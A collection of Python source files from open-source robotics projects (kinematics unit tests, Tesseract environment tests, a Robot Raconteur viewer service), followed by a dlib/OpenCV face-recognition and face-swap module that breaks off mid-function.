q_t=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
q=rox.R2q(rot)
np.testing.assert_allclose(q_t, q, atol=1e-6)
def test_q2R():
rot_t=np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
q=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
rot=rox.q2R(q)
np.testing.assert_allclose(rot, rot_t, atol=1e-6)
def test_rot2q():
k, theta=rox.R2rot(np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]]))
q_t=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
q=rox.rot2q(k,theta)
np.testing.assert_allclose(q_t, q, atol=1e-6)
def test_q2rot():
rot_t=np.array([[-0.5057639,-0.1340537,0.8521928], \
[0.6456962,-0.7139224,0.2709081], \
[0.5720833,0.6872731,0.4476342]])
q=np.array([0.2387194, 0.4360402, 0.2933459, 0.8165967])
k, theta=rox.q2rot(q)
np.testing.assert_allclose(rox.rot(k, theta), rot_t, atol=1e-6)
def test_quatcomplement():
q=np.array([[ 0.2387194, 0.4360402, 0.2933459, 0.8165967]]).T
q_c=rox.quatcomplement(q)
np.testing.assert_allclose(q[0], q_c[0])
np.testing.assert_allclose(q[1:3], -q_c[1:3])
def test_quatproduct():
q_1=np.array([0.63867877, 0.52251797, 0.56156573, 0.06089615])
q_2=np.array([0.35764716, 0.61051424, 0.11540801, 0.69716703])
R_t=rox.q2R(q_1).dot(rox.q2R(q_2))
q_t=rox.R2q(R_t)
q = rox.quatproduct(q_1).dot(q_2).reshape((4,))
np.testing.assert_allclose(q, q_t, atol=1e-6)
def test_quatjacobian():
#TODO: test against better control case
q=np.array([0.63867877, 0.52251797, 0.56156573, 0.06089615])
J=rox.quatjacobian(q)
J_t=np.array([[-0.26125898, -0.28078286, -0.03044808], \
[ 0.31933938, 0.03044808, -0.28078286], \
[-0.03044808, 0.31933938, 0.26125898], \
[ 0.28078286, -0.26125898, 0.31933938]])
np.testing.assert_allclose(J, J_t, atol=1e-6)
def test_rpy2R():
rpy1=np.deg2rad([10,-30,90])
R1=rox.rpy2R(rpy1)
R1_t=np.array([[-0.0000000, -0.9848077, 0.1736482], \
[0.8660254, -0.0868241, -0.4924039], \
[0.5000000, 0.1503837, 0.8528686 ]])
np.testing.assert_allclose(R1, R1_t, atol=1e-6)
rpy2=rox.R2rpy(R1)
np.testing.assert_allclose(rpy1,rpy2, atol=1e-6)
#Check singularity
rpy3=np.deg2rad([10,90,-30])
R3=rox.rpy2R(rpy3)
with pytest.raises(Exception):
rox.R2rpy(R3)
def test_fwdkin():
#TODO: other joint types
#Home configuration (See Page 2-2 of Puma 260 manual)
puma=puma260b_robot()
pose=rox.fwdkin(puma, np.zeros(6))
np.testing.assert_allclose(pose.R, np.identity(3))
np.testing.assert_allclose(pose.p, np.array([10,-4.9,4.25])*in_2_m, atol=1e-6)
#Another right-angle configuration
joints2=np.array([180,-90,-90, 90, 90, 90])*np.pi/180.0
pose2=rox.fwdkin(puma, joints2)
np.testing.assert_allclose(pose2.R, rox.rot([0,0,1],np.pi).dot(rox.rot([0,1,0], -np.pi/2)), atol=1e-6)
np.testing.assert_allclose(pose2.p, np.array([-0.75, 4.9, 31])*in_2_m)
#Random configuration
joints3=np.array([50, -105, 31, 4, 126, -184])*np.pi/180
pose3=rox.fwdkin(puma,joints3)
pose3_R_t=np.array([[0.4274, 0.8069, -0.4076],\
[0.4455, -0.5804,-0.6817], \
[-0.7866, 0.1097, -0.6076]])
pose3_p_t=[0.2236, 0.0693, 0.4265]
np.testing.assert_allclose(pose3.R, pose3_R_t, atol=1e-4)
np.testing.assert_allclose(pose3.p, pose3_p_t, atol=1e-4)
puma_tool=puma260b_robot_tool()
pose4=rox.fwdkin(puma_tool, joints3)
pose4_R_t=np.array([[0.4076, 0.8069, 0.4274],\
[0.6817, -0.5804,0.4455], \
[0.6076, 0.1097, -0.7866]])
pose4_p_t=[0.2450, 0.0916, 0.3872]
np.testing.assert_allclose(pose4.R, pose4_R_t, atol=1e-4)
np.testing.assert_allclose(pose4.p, pose4_p_t, atol=1e-4)
def test_robotjacobian():
#Home configuration (See Page 2-2 of Puma 260 manual)
puma=puma260b_robot()
J=rox.robotjacobian(puma, np.zeros(6))
np.testing.assert_allclose(J[0:3,:], puma.H, atol=1e-4)
J_t_v=np.array([[4.9,10,0],[-8.75,0,-10],[-8,0,-2.2], \
[0,2.2,0],[0,0,-2.2],[0,0,0]]).T*in_2_m
np.testing.assert_allclose(J[3:6,:], J_t_v, atol=1e-4)
#Another right-angle configuration
joints2=np.array([180,-90,-90, 90, 90, 90])*np.pi/180.0
J2=rox.robotjacobian(puma, joints2)
J2_t=np.array([[0,0,0,0,-1,0], \
[0,-1,-1,0,0,0], \
[1,0,0,-1,-0,1], \
[-0.1245,-0.4572,-0.2591,0,0,0], \
[-0.0191,0,0,0,0.0559,0], \
[0,-0.0191,0,0,0,0,]])
np.testing.assert_allclose(J2, J2_t, atol=1e-4)
#Random configuration
joints3=np.array([50, -105, 31, 4, 126, -184])*np.pi/180
J3=rox.robotjacobian(puma, joints3)
J3_t=np.array([[0, -0.766, -0.766,-0.6179, -0.7765, 0.4274], \
[0, 0.6428, 0.6428, -0.7364, 0.6265, 0.4456], \
[1, 0, 0, 0.2756, -0.0671, -0.7866], \
[-0.0693, 0.0619, -0.0643, 0.0255, -0.0259, 0], \
[0.2236, 0.0738, -0.0766, -0.0206, -0.0357, 0], \
[0, -0.1969, -0.2298, 0.0022, -0.0343, 0]])
np.testing.assert_allclose(J3, J3_t, atol=1e-4)
def test_subproblems():
x=[1,0,0]
y=[0,1,0]
z=[0,0,1]
#subproblem0
assert(rox.subproblem0(x,y,z) == np.pi/2)
#subproblem1
k1=(np.add(x,z))/np.linalg.norm(np.add(x,z))
k2=(np.add(y,z))/np.linalg.norm(np.add(y,z))
assert(rox.subproblem1(k1, k2, z) == np.pi/2)
#subproblem2
p2=x
q2=np.add(x, np.add(y,z))
q2=q2/np.linalg.norm(q2)
a2 = rox.subproblem2(p2, q2, z, y)
assert len(a2) == 2
r1=rox.rot(z,a2[0][0]).dot(rox.rot(y,a2[0][1]))[:,0]
r2=rox.rot(z,a2[1][0]).dot(rox.rot(y,a2[1][1]))[:,0]
np.testing.assert_allclose(r1, q2, atol=1e-4)
np.testing.assert_allclose(r2, q2, atol=1e-4)
a3 = rox.subproblem2(x, z, z, y)
assert len(a3) == 1
r3=rox.rot(z,a3[0][0]).dot(rox.rot(y,a3[0][1]))[:,0]
np.testing.assert_allclose(r3, z, atol=1e-4)
#subproblem3
p4=[.5, 0, 0]
q4=[0, .75, 0]
a4=rox.subproblem3(p4, q4, z, .5)
a5=rox.subproblem3(p4, q4, z, 1.25)
assert len(a4) == 2
np.testing.assert_allclose(np.linalg.norm(np.add(q4, rox.rot(z, a4[0]).dot(p4))),0.5)
np.testing.assert_allclose(np.linalg.norm(np.add(q4, rox.rot(z, a4[1]).dot(p4))),0.5)
assert len(a5) == 1
np.testing.assert_allclose(np.linalg.norm(np.add(q4, rox.rot(z, a5[0]).dot(p4))),1.25)
#subproblem4
p6=y
q6=[.8, .2, .5]
d6=.3
a6=rox.subproblem4(p6, q6, z, d6)
np.testing.assert_allclose(np.dot(p6, rox.rot(z,a6[0]).dot(q6)), d6, atol=1e-4)
np.testing.assert_allclose(np.dot(p6, rox.rot(z,a6[1]).dot(q6)), d6, atol=1e-4)
def test_robot6_sphericalwrist_invkin():
robot1=puma260b_robot()
robot2=abb_irb6640_180_255_robot()
robot3=puma260b_robot_tool()
def _test_configuration(robot, theta):
pose_1 = rox.fwdkin(robot, theta)
theta2 = rox.robot6_sphericalwrist_invkin(robot, pose_1)
if not len(theta2) > 0:
return False
for theta2_i in theta2:
pose_2 = rox.fwdkin(robot, theta2_i)
if not pose_1 == pose_2:
return False
return True
def _test_last_configuration(robot, theta, last_theta):
pose_1 = rox.fwdkin(robot, theta)
theta2 = rox.robot6_sphericalwrist_invkin(robot, pose_1, last_theta)
pose_2 = rox.fwdkin(robot, theta2[0])
if not pose_1 == pose_2:
return False
if not np.allclose(theta2[0], last_theta, atol=np.deg2rad(10)):
return False
return True
assert _test_configuration(robot1, np.zeros(6))
#Previous failed value, add to unit test
assert _test_configuration(robot2, [-0.09550528, -0.43532822, -2.35369965, -2.42324955, -1.83659391, -4.00786639])
for robot in (robot1,robot2,robot3):
for _ in xrange(100):
theta = np.random.rand(6)*(robot.joint_upper_limit - robot.joint_lower_limit) \
+ robot.joint_lower_limit
assert _test_configuration(robot, theta)
theta_test1 = np.zeros(6)
assert _test_last_configuration(robot1, theta_test1, theta_test1 + np.deg2rad(4))
assert _test_last_configuration(robot2, theta_test1 - np.deg2rad(4), np.array([0,0,0,0,0,np.pi*2]))
for robot in (robot1,robot2,robot3):
for _ in xrange(100):
theta = np.random.rand(6)*(robot.joint_upper_limit - robot.joint_lower_limit - np.deg2rad(30)) \
+ robot.joint_lower_limit + np.deg2rad(15)
last_theta = theta + (np.random.rand(6)-0.5)*2*np.deg2rad(4)
assert _test_last_configuration(robot, theta, last_theta)
def puma260b_robot():
"""Returns an approximate Robot instance for a Puma 260B robot"""
x=np.array([1,0,0])
y=np.array([0,1,0])
z=np.array([0,0,1])
a=np.array([0,0,0])
H = np.array([z,y,y,z,y,x]).T
P = np.array([13*z, a, (-4.9*y + 7.8*x -0.75*z), -8.0*z, a, a, 2.2*x]).T*in_2_m
joint_type=[0,0,0,0,0,0]
joint_min=np.deg2rad(np.array([-5, -256, -214, -384, -32, -267]))
joint_max=np.deg2rad(np.array([313, 76, 34, 194, 212, 267]))
return rox.Robot(H, P, joint_type, joint_min, joint_max)
def puma260b_robot_tool():
robot=puma260b_robot()
robot.R_tool=rox.rot([0,1,0], np.pi/2.0)
robot.p_tool=[0.05, 0, 0]
return robot
def abb_irb6640_180_255_robot():
"""Return a Robot instance for the ABB IRB6640 180-255 robot"""
x=np.array([1,0,0])
y=np.array([0,1,0])
z=np.array([0,0,1])
a=np.array([0,0,0])
H = np.array([z,y,y,x,y,x]).T
P = np.array([0.78*z, 0.32*x, 1.075*z, 0.2*z, 1.142*x, 0.2*x, a]).T
joint_type=[0,0,0,0,0,0]
joint_min=np.deg2rad(np.array([-170, -65, -180, -300, -120, -360]))
joint_max=np.deg2rad(np.array([170, 85, 70, 300, 120, 360]))
p_tool=np.array([0,0,0])
R_tool=rox.rot([0,1,0], np.pi/2.0)
return rox.Robot(H, P, joint_type, joint_min, joint_max, R_tool=R_tool, p_tool=p_tool)
```
#### File: rpi_general_robotics_toolbox_py/test/test_ros_tf.py
```python
import general_robotics_toolbox as rox
import numpy as np
import pytest
rospy = pytest.importorskip('rospy')
import general_robotics_toolbox.ros_tf as rox_tf
import general_robotics_toolbox.ros_msg as rox_msg
#Numeric precision reduced for literals
eps = 1e-6 #np.finfo(np.float64).eps
def test_ros_tf_listener():
l=rox_tf.TransformListener()
rox_tf1=rox.random_transform()
rox_tf1.parent_frame_id='world'
rox_tf1.child_frame_id='link1'
rox_tf2=rox.random_transform()
rox_tf2.parent_frame_id='link1'
rox_tf2.child_frame_id='link2'
l.ros_listener.setTransform(rox_msg.transform2transform_stamped_msg(rox_tf1))
l.ros_listener.setTransform(rox_msg.transform2transform_stamped_msg(rox_tf2))
assert l.canTransform('world','link1')
assert l.canTransformFull('world', rospy.Time(0), 'link1', rospy.Time(0), 'world')
assert not l.canTransform('world','link3')
l.waitForTransform('world','link1',rospy.Time(0), rospy.Duration(5))
l.waitForTransformFull('world', rospy.Time(0), 'link1', rospy.Time(0), 'world', rospy.Duration(5))
l_tf1=l.lookupTransform('world','link1')
assert l_tf1 == rox_tf1
l_tf1_full=l.lookupTransformFull('world', rospy.Time(0), 'link1', rospy.Time(0), 'world')
assert l_tf1_full == rox_tf1
l_tf1_2=l.lookupTransform('world','link2')
assert l_tf1_2 == rox_tf1*rox_tf2
```
#### File: rpi_general_robotics_toolbox_py/test/test_urdf_loader.py
```python
import general_robotics_toolbox as rox
import numpy as np
import pytest
xacro = pytest.importorskip("xacro")
rospkg = pytest.importorskip("rospkg")
from general_robotics_toolbox import urdf
def test_irb6640():
robot = urdf.robot_from_xacro_file("test/irb6640_180_255_nogeom.xacro", "rpi_general_robotics_toolbox_py")
_assert_robot(robot)
robot2 = urdf.robot_from_xml_file("test/irb6640_180_255_nogeom.urdf", "rpi_general_robotics_toolbox_py")
_assert_robot(robot2)
robot3 = urdf.robot_from_xml_file("test/irb6640_180_255_nogeom_twist.urdf", "rpi_general_robotics_toolbox_py")
_assert_robot(robot3)
def _assert_robot(robot):
np.testing.assert_allclose(robot.H, np.array([[0.,0.,0.,1.,0.,1.],[0.,1.,1.,0.,1.,0.],[1.,0.,0.,0.,0.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.P, np.array([[0.,0.32,0.,0.,1.142,0.2,0.],[0.,0.,0.,0.,0.,0.,0.],[0.78,0.,1.075,0.2,0.,0.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.joint_type, np.array([0.,0.,0.,0.,0.,0.]), atol=1e-4)
np.testing.assert_allclose(robot.joint_lower_limit, np.array([-2.967,-1.134,-3.142,-5.236,-2.094,-6.283]), atol=1e-4)
np.testing.assert_allclose(robot.joint_upper_limit, np.array([2.967,1.4855,1.222,5.236,2.094,6.283]), atol=1e-4)
np.testing.assert_allclose(robot.joint_vel_limit, np.array([1.7453,1.5707,1.5707,2.9671,2.4435,3.3161]), atol=1e-4)
np.testing.assert_allclose(robot.R_tool, np.array([[0,0,1], [0,1,0], [-1,0,0]]), atol=1e-4)
np.testing.assert_allclose(robot.p_tool, [0,0,0], atol=1e-4)
def test_sda10f():
with pytest.raises(AssertionError):
urdf.robot_from_xml_file("test/sda10f_nogeom.urdf", "rpi_general_robotics_toolbox_py")
left_robot = urdf.robot_from_xml_file("test/sda10f_nogeom.urdf", "rpi_general_robotics_toolbox_py", tip_link='arm_left_link_tool0')
_assert_left_robot(left_robot)
right_robot = urdf.robot_from_xml_file("test/sda10f_nogeom.urdf", "rpi_general_robotics_toolbox_py", root_link='torso_link_b1', tip_link='arm_right_link_tool0')
_assert_right_robot(right_robot)
def _assert_left_robot(robot):
np.testing.assert_allclose(robot.H, np.array([[0.,0.,0.,0.,0.,0.,0.,0.],[0.,1.,0.,1.,0.,-1.,0.,1.],[1.,0,-1.,0.,1.,0.,1.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.P, np.array([[0.0926,0.0999,0.,0.,0.,0.,0.,0.,0.],[0.,0.0275,0.2255,0.169,0.181,0.1936,0.155,0.168,0.],[0.8835,0.3221,0.0577,-0.0454,-0.0085,0.0155,0.008,-0.015,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.joint_type, np.array([0.,0.,0.,0.,0.,0.,0.,0.]), atol=1e-4)
np.testing.assert_allclose(robot.joint_lower_limit, np.array([-2.957,-3.13,-1.9,-2.95,-2.36,-3.13,-1.9,-3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_upper_limit, np.array([2.957,3.13,1.9,2.95,2.36,3.13,1.9,3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_vel_limit, np.array([2.26,2.95,2.95,2.95,2.95,3.48,3.48,6.97]), atol=1e-4)
np.testing.assert_allclose(robot.R_tool, np.array([[-1,0,0],[0,0,-1],[0,-1,0]]), atol=1e-4)
np.testing.assert_allclose(robot.p_tool, np.zeros((3,)), atol=1e-4)
def _assert_right_robot(robot):
np.testing.assert_allclose(robot.H, np.array([[0.,0.,0.,0.,0.,0.,0.],[1.,0.,1.,0.,-1.,0.,1.],[0.,1.,0.,-1.,0.,-1.,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.P, np.array([[0.1,0.,0.,0.,0.,0.,0.,0.],[-0.0275,-0.2255,-0.169,-0.181,-0.1936,-0.155,-0.168,0.],[0.3221,0.0577,-0.0454,-0.0085,0.0155,0.008,-0.015,0.]]), atol=1e-4)
np.testing.assert_allclose(robot.joint_type, np.array([0.,0.,0.,0.,0.,0.,0.]), atol=1e-4)
np.testing.assert_allclose(robot.joint_lower_limit, np.array([-3.13,-1.9,-2.95,-2.36,-3.13,-1.9,-3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_upper_limit, np.array([3.13,1.9,2.95,2.36,3.13,1.9,3.13]), atol=1e-4)
np.testing.assert_allclose(robot.joint_vel_limit, np.array([2.95,2.95,2.95,2.95,3.48,3.48,6.97]), atol=1e-4)
np.testing.assert_allclose(robot.R_tool, np.array([[1,0,0],[0,0,1],[0,-1,0]]), atol=1e-4)
np.testing.assert_allclose(robot.p_tool, np.zeros((3,)), atol=1e-4)
``` |
{
"source": "johnwason/tesseract_python-1",
"score": 3
} |
#### File: tests/tesseract_common/test_tesseract_common.py
```python
from tesseract import tesseract_common
def test_status_code():
# Test that status codes can be created
status_code = tesseract_common.StatusCode(100, tesseract_common.GeneralStatusCategory())
print(status_code)
def test_bytes_resource():
my_bytes = bytearray([10,57,92,56,92,46,92,127])
my_bytes_url = "file:///test_bytes.bin"
bytes_resource = tesseract_common.BytesResource(my_bytes_url,my_bytes)
my_bytes_ret = bytes_resource.getResourceContents()
assert(len(my_bytes_ret) == len(my_bytes))
assert(my_bytes == bytearray(my_bytes_ret))
assert(my_bytes_url == bytes_resource.getUrl())
```
#### File: tests/tesseract_environment/test_tesseract_environment.py
```python
from tesseract import tesseract_scene_graph
from tesseract import tesseract_collision
from tesseract import tesseract_environment
from tesseract.tesseract_common import Isometry3d, Translation3d, AngleAxisd
from tesseract import tesseract_common
from tesseract import tesseract_collision
from tesseract import tesseract_collision_bullet
from tesseract import tesseract_urdf
import os
import re
def _locate_resource(url):
try:
url_match = re.match(r"^package:\/\/tesseract_support\/(.*)$",url)
if (url_match is None):
return ""
if not "TESSERACT_SUPPORT_DIR" in os.environ:
return ""
tesseract_support = os.environ["TESSERACT_SUPPORT_DIR"]
return os.path.join(tesseract_support, os.path.normpath(url_match.group(1)))
except:
traceback.print_exc()
def get_scene_graph():
tesseract_support = os.environ["TESSERACT_SUPPORT_DIR"]
path = os.path.join(tesseract_support, "urdf/lbr_iiwa_14_r820.urdf")
locator_fn = tesseract_scene_graph.SimpleResourceLocatorFn(_locate_resource)
locator = tesseract_scene_graph.SimpleResourceLocator(locator_fn)
return tesseract_urdf.parseURDFFile(path, locator)
def get_srdf_model(scene_graph):
tesseract_support = os.environ["TESSERACT_SUPPORT_DIR"]
path = os.path.join(tesseract_support, "urdf/lbr_iiwa_14_r820.srdf")
srdf = tesseract_scene_graph.SRDFModel()
srdf.initFile(scene_graph, path)
return srdf
def get_environment():
scene_graph = get_scene_graph()
assert scene_graph is not None
srdf = get_srdf_model(scene_graph)
assert srdf is not None
env = tesseract_environment.Environment()
assert env is not None
assert env.getRevision() == 0
success = env.init(scene_graph,srdf)
assert success
assert env.getRevision() == 2
# env.init() now populates contact managers?
"""discrete_create_fn = tesseract_collision.DiscreteContactManagerFactoryCreateMethod(tesseract_collision_bullet.BulletDiscreteBVHManager.create)
assert env.registerDiscreteContactManager(tesseract_collision_bullet.BulletDiscreteBVHManager.name(),
discrete_create_fn)
cont_create_fn = tesseract_collision.ContinuousContactManagerFactoryCreateMethod(tesseract_collision_bullet.BulletCastBVHManager.create)
assert env.registerContinuousContactManager(tesseract_collision_bullet.BulletCastBVHManager.name(),
cont_create_fn)
env.setActiveDiscreteContactManager(tesseract_collision_bullet.BulletDiscreteBVHManager.name())
env.setActiveContinuousContactManager(tesseract_collision_bullet.BulletCastBVHManager.name())"""
return env
def test_env():
get_environment()
``` |
{
"source": "johnwason/tesseract_viewer_python_robotraconteur",
"score": 2
} |
#### File: johnwason/tesseract_viewer_python_robotraconteur/tesseract_viewer_python_service.py
```python
import RobotRaconteur as RR
RRN = RR.RobotRaconteurNode.s
import RobotRaconteurCompanion as RRC
from tesseract.tesseract_common import FilesystemPath, Isometry3d, Translation3d, Quaterniond, \
ManipulatorInfo
from tesseract.tesseract_environment import Environment
from tesseract.tesseract_scene_graph import SimpleResourceLocator, SimpleResourceLocatorFn
from tesseract.tesseract_command_language import StateWaypoint, Waypoint, MoveInstruction, \
Instruction, CompositeInstruction, MoveInstructionType_FREESPACE
import os
import re
import traceback
from tesseract_viewer import TesseractViewer
import numpy as np
import time
import sys
import argparse
from typing import List
import threading
_robdef = """
service experimental.tesseract_viewer
import com.robotraconteur.robotics.trajectory
using com.robotraconteur.robotics.trajectory.JointTrajectory
object TesseractViewer
property string{list} joint_names [readonly]
function void update_joint_positions(string{list} joint_names, double[] joint_positions)
function void update_trajectory(JointTrajectory trajectory)
end
"""
def main():
parser = argparse.ArgumentParser(description="Tesseract Viewer Standalone Robot Raconteur Service")
parser.add_argument("--urdf-file", type=argparse.FileType('r'),default=None,required=True,help="URDF file for scene (required)")
parser.add_argument("--srdf-file", type=argparse.FileType('r'),default=None,required=True,help="SRDF file for scene (required)")
parser.add_argument("--manipulator-name", type=str, default="manipulator",help="Name of manipulator in SRDF file (default \"manipulator\"")
parser.add_argument("--z-offset",type=float,default=0.0,help="Z-offset for scene (default 0.0)")
parser.add_argument("--http-port",type=int,default=8000,help="HTTP TCP/IP Listen Port (default 8000)")
args, _ = parser.parse_known_args()
with args.urdf_file:
urdf_file_text = args.urdf_file.read()
with args.srdf_file:
srdf_file_text = args.srdf_file.read()
t_env = Environment()
# locator_fn must be kept alive by maintaining a reference
locator = GazeboModelResourceLocator()
t_env.init(urdf_file_text, srdf_file_text, locator)
manip_info = ManipulatorInfo()
manip_info.manipulator = args.manipulator_name
viewer = TesseractViewer(server_address=('',args.http_port))
viewer.update_environment(t_env, [0,0,args.z_offset])
# TODO: thread lock for updates?
viewer.start_serve_background()
joint_names = list(t_env.getActiveJointNames())
obj=TesseractViewerService(viewer,joint_names)
RRC.RegisterStdRobDefServiceTypes(RRN)
RRN.RegisterServiceType(_robdef)
with RR.ServerNodeSetup("experimental.tesseract_viewer",59712,argv=sys.argv):
RRN.RegisterService("tesseract_viewer","experimental.tesseract_viewer.TesseractViewer",obj)
if sys.version_info[0] < 3:
input("press enter")
else:
input("press enter")
class TesseractViewerService:
def __init__(self, viewer : TesseractViewer, joint_names: List[str]):
self._viewer = viewer
self.joint_names = joint_names
self._lock = threading.Lock()
def update_joint_positions(self, joint_names : List[str], joint_positions : np.array):
with self._lock:
assert len(joint_positions) == len(joint_names), "joint_names and joint_positions must have same length"
for j in joint_names:
assert j in self.joint_names, f"Invalid joint name: {j}"
self._viewer.update_joint_positions(joint_names, joint_positions)
def update_trajectory(self, trajectory):
#TODO: more error checking
joint_names = trajectory.joint_names
for j in joint_names:
assert j in self.joint_names, f"Invalid joint name: {j}"
traj2 = CompositeInstruction("DEFAULT")
for wp in trajectory.waypoints:
assert len(wp.joint_position) == len(joint_names), "Invalid joint position vector len"
wp2 = StateWaypoint(joint_names, wp.joint_position)
wp2.time = wp.time_from_start
move_instr = MoveInstruction(Waypoint(wp2), MoveInstructionType_FREESPACE)
traj2.append(Instruction(move_instr))
self._viewer.update_trajectory(traj2)
class GazeboModelResourceLocatorFn:
def __init__(self):
model_env_path = os.environ["GAZEBO_MODEL_PATH"]
self.model_paths = model_env_path.split(os.pathsep)
assert len(self.model_paths) != 0, "No GAZEBO_MODEL_PATH specified!"
for p in self.model_paths:
assert os.path.isdir(p), "GAZEBO_MODEL_PATH directory does not exist: %s" % p
def __call__(self,url):
try:
url_match = re.match(r"^model:\/\/(\w+)\/(.+)$",url)
if (url_match is None):
assert False, "Invalid Gazebo model resource url %s" % url
model_name = url_match.group(1)
resource_path = os.path.normpath(url_match.group(2))
for p in self.model_paths:
fname = os.path.join(p, model_name, resource_path )
if not os.path.isfile(fname):
continue
return fname
assert False, "Could not find requested resource %s" % url
except:
traceback.print_exc()
return ""
def GazeboModelResourceLocator():
locator_fn = SimpleResourceLocatorFn(GazeboModelResourceLocatorFn())
locator = SimpleResourceLocator(locator_fn)
locator_fn.__disown__()
return locator
if __name__ == "__main__":
main()
``` |
{
"source": "JohnWatson96/Image-Processing-Face-Recognition",
"score": 3
} |
#### File: JohnWatson96/Image-Processing-Face-Recognition/face_functions.py
```python
import cv2
import dlib
import numpy as np
from scipy.spatial import Delaunay
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor("../dlib-models/shape_predictor_68_face_landmarks.dat")
recogniser = dlib.face_recognition_model_v1("../dlib-models/dlib_face_recognition_resnet_model_v1.dat")
def match(src_descriptor, descriptors):
distances = np.linalg.norm(descriptors - src_descriptor, axis=1)
if True in list(distances <= 0.6):
return np.argmin(distances)
else:
return None
def recognise(img, shape):
descriptor = np.array(recogniser.compute_face_descriptor(img, shape))
return descriptor
def swap(src_img, src_points, src_bbox, input_img, input_points):
if src_points is None or src_bbox is None: # no face detected
print("No face to swap")
return src_img
result_img = warp(src_img, src_points, src_bbox, input_img, input_points)
"""src_img = draw(src_img)
for point in input_points:
cv2.circle(input_img, (point[0], point[1]), 2, (0, 255, 0), -1)
bbox = find(input_img)[1]
cv2.line(input_img, tuple(bbox[0]), tuple(bbox[1]), (0, 0, 255), 2)
cv2.line(input_img, tuple(bbox[0]), tuple(bbox[2]), (0, 0, 255), 2)
cv2.line(input_img, tuple(bbox[2]), tuple(bbox[3]), (0, 0, 255), 2)
cv2.line(input_img, tuple(bbox[1]), tuple(bbox[3]), (0, 0, 255), 2)
cv2.imshow("John", src_img)
cv2.imshow("Andrew", input_img)
cv2.waitKey(0) # Demonstration"""
## Mask for blending
h, w = src_img.shape[:2]
mask = mask_from_points((h, w), src_points)
#cv2.imshow("mask", mask)
mask_src = np.mean(result_img, axis=2) > 0
mask = np.asarray(mask * mask_src, dtype=np.uint8)
#cv2.imshow("mask1", mask)
# colour correction
#Apply Masks
result_img = cv2.bitwise_and(result_img, result_img, mask=mask)
#cv2.imshow("result_img", result_img)
dst_face_masked = cv2.bitwise_and(src_img, src_img, mask=mask)
#cv2.imshow("dst_face_masked", dst_face_masked)
result_img = correct_colours(dst_face_masked, result_img, src_points)
#cv2.imshow("result_img2", result_img)
## Shrink the mask
kernel = np.ones((10, 10), np.uint8)
mask = cv2.erode(mask, kernel, iterations=1)
#cv2.imshow("mask3", mask)
##Poisson Blending
r = cv2.boundingRect(mask)
center = ((r[0] + int(r[2] / 2), r[1] + int(r[3] / 2)))
result_img = cv2.seamlessClone(result_img, src_img, mask, center, cv2.NORMAL_CLONE)
#cv2.imshow("result_img3", result_img)
#cv2.waitKey(0)
return result_img
def correct_colours(im1, im2, landmarks1):
COLOUR_CORRECT_BLUR_FRAC = 0.75 #Blending amount
LEFT_EYE_POINTS = list(range(42, 48))
RIGHT_EYE_POINTS = list(range(36, 42))
#determine kernal size
blur_amount = COLOUR_CORRECT_BLUR_FRAC * np.linalg.norm(np.mean(landmarks1[LEFT_EYE_POINTS], axis=0) - np.mean(landmarks1[RIGHT_EYE_POINTS], axis=0))
blur_amount = int(blur_amount)
#Ensure kernal size value is not even
if blur_amount % 2 == 0:
blur_amount += 1
# Apply blur
im1_blur = cv2.medianBlur(im1, blur_amount, 0)
im2_blur = cv2.medianBlur(im2, blur_amount, 0)
# Avoid divide-by-zero errors.
im2_blur = im2_blur.astype(int)
im2_blur = im2_blur + 128*(im2_blur <= 1)
#Blend images
result = np.float64(im2) * np.float64(im1_blur) / np.float64(im2_blur)
#Remove overflown pixel values
result = np.uint8(np.clip(result, 0, 255))
return result
def mask_from_points(size, points):
#Create kernel array
kernel = np.ones((10, 10), np.uint8)
#Create mask of zeroes
mask = np.zeros(size, np.uint8)
cv2.fillConvexPoly(mask, cv2.convexHull(points), 255)
mask = cv2.erode(mask, kernel, iterations=1)
return mask
def find(img):
detections = detector(img) # detect faces and store rectangles
if len(detections) == 0:
print("No face detected")
return None, None, None
shape = predictor(img, detections[0]) # find the shape of the face (use first detected face)
points = np.array(list([point.x, point.y] for point in shape.parts()))
points = find_pupils(img, points)
bbox = [[min(points[:, 0]), min(points[:, 1])], [max(points[:, 0]), min(points[:, 1])],
[min(points[:, 0]), max(points[:, 1])], [max(points[:, 0]), max(points[:, 1])]]
'''
0 1
2 3
'''
return points, bbox, shape
def find_pupils(img, points):
left_bbox = [[min(points[36:41, 0]), min(points[36:41, 1])], [max(points[36:41, 0]), min(points[36:41, 1])],
[min(points[36:41, 0]), max(points[36:41, 1])], [max(points[36:41, 0]), max(points[36:41, 1])]]
right_bbox = [[min(points[42:47, 0]), min(points[42:47, 1])], [max(points[42:47, 0]), min(points[42:47, 1])],
[min(points[42:47, 0]), max(points[42:47, 1])], [max(points[42:47, 0]), max(points[42:47, 1])]]
# find bounding box for eyes
bboxs = [left_bbox, right_bbox]
for bbox in bboxs:
eye = img[bbox[0][1]:bbox[3][1], bbox[0][0]:bbox[3][0]] # crop image to each eye
#cv2.imshow("eye", eye)
eye = cv2.cvtColor(eye, cv2.COLOR_BGR2GRAY) # convert to single channel
#cv2.imshow("eye1", eye)
#eye = cv2.inRange(eye, (0, 0, 0), (50, 50, 50))
eye = cv2.GaussianBlur(eye, (3, 3), 0)
#cv2.imshow("eye2", eye)
eye = cv2.erode(eye, (3, 3), iterations=3)
#cv2.imshow("eye3", eye)
ret, _ = cv2.threshold(eye, 0, 255, cv2.THRESH_OTSU)
_, eye = cv2.threshold(eye, ret*0.7, 255, cv2.THRESH_BINARY_INV)
#cv2.imshow("eye4", eye)
#cv2.waitKey(0)
try:
m = cv2.moments(eye)
x = int(m["m10"] / m["m00"])
y = int(m["m01"] / m["m00"])
eye = cv2.cvtColor(eye, cv2.COLOR_GRAY2BGR)
